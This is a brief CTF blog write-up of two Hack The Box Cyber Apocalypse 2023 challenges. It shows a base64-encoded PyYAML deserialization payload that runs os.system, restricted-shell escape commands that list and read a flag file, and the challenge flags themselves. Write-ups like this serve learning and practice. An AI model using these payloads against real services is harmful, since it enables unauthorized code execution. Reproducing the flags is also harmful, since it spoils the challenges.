🍎
Posts Tags Categories
🍎

Contents

CTF: HTB Cyber Apocalypse 2023 Part 2

 included in CTF
   116 words   One minute 
/posts/ctf/htb-ca2023-p2/images/featured-image.jpg
Contents

Hijack

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230324144440.png

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230322213720.png

It shows Serialized config.

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230322213901.png
www.base64decode.org

It is using python as it’s backend, and some kind of serialization.

By google search i found this blog

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230322213957.png

!!python/object/apply:os.system ["cat flag.txt"]

Encode this rce payload in base64

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230322214211.png

ISFweXRob24vb2JqZWN0L2FwcGx5Om9zLnN5c3RlbSBbImNhdCBmbGFnLnR4dCJdCg==

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230322214344.png

Flag: HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}

Restricted

From docker file I found that flag is beind renamed with some random strings with flag_ prefix in root directory

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230322214944.png

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230322215003.png

So our flag will look like flag_t04P0

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230322220950.png

There is restricted commands,so to list available commands use compgen -ac

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230322220856.png

let’s list files using echo and wildcard echo /* (echo under / root directory * everything that exist)

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230322220707.png

Our flag is inside /flag_8dpsy Now time to read contents of file.

while read line; do echo $line; done </flag_8dpsy

/posts/ctf/htb-ca2023-p2/images/Pasted%20image%2020230322221523.png

Flag: HTB{r35tr1ct10n5_4r3_p0w3r1355}

Updated on 2023-03-27
 CTFBashPythonRCEDeserializationyaml
Back | Home